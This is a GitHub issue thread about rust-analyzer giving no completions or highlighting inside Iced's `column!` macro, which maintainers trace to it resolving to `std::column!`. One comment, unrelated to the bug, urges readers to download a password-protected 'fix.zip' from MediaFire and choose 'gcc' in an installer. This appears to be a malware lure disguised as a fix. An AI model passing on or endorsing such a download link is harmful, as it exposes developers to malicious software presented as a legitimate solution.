### ISSUE TITLE
Autocomplete and Highlighting Issues in `Iced` Library

### ISSUE THREAD

**Issue by yuukibarns** [rust-lang/rust-analyzer#17969]
**rust-analyzer version**: 2024-08-26

**rustc version**: 1.79.0

**editor or extension**: Neovim, nvim-lspconfig
**relevant settings**:
```lua
["rust-analyzer"] = {
	checkOnSave = false,
	cargo = {
		buildScripts = {
			enable = true,
		},
	},
	procMacro = {
		enable = true,
	},
	cachePriming = {
		enable = true,
	},
},
```
**Description:**

I am encountering an issue with the autocomplete and highlighting features in the Iced library when using Rust. Specifically, the problem arises when I attempt to use the `column!` macro without assigning it to a variable.

**Steps to Reproduce:**

1. Write the following code:
    ```rust
    impl Counter {
        fn update(&mut self, msg: Message) {
            match msg {
                Message::Decrement => {
                    self.value -= 1;
                }
                Message::Increament => {
                    self.value += 1;
                }
            }
        }
        fn view(&self) -> Column<Message> {
            column![bu]
        }
    }
    ```

2. Observe that after typing `bu`, there is no hint that jumps up and no highlight.

**Expected Behavior:**

Autocomplete hints and highlighting should appear after typing `bu` within the `column!` macro.

**Actual Behavior:**

No autocomplete hints or highlighting appear.

**Workaround:**

Assigning the `column!` macro to a variable resolves the issue:

```rust
impl Counter {
    fn update(&mut self, msg: Message) {
        match msg {
            Message::Decrement => {
                self.value -= 1;
            }
            Message::Increament => {
                self.value += 1;
            }
        }
    }
    fn view(&self) -> Column<Message> {
        let interface = column![bu]
    }
}
```

**Environment:**

- Rust version: [Insert Rust version here]
- Iced version: [Insert Iced version here]
- IDE/Editor: [Insert IDE/Editor name and version here]

**Additional Context:**

This issue seems to be specific to the `column!` macro when used directly without assigning it to a variable. It would be beneficial to investigate why this behavior occurs and if it can be resolved to improve the developer experience.

https://github.com/user-attachments/assets/c22f8aff-80a2-413a-a371-734799e85097

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yuukibarns** [comment]
No, row![..] is Ok

**Comment by lnicola** [comment]
It's because of `std::column!`, isn't it? :smile:

**Comment by Veykril** [comment]
oooh, yes we are likely resolving this to `std::column` when in a block def map
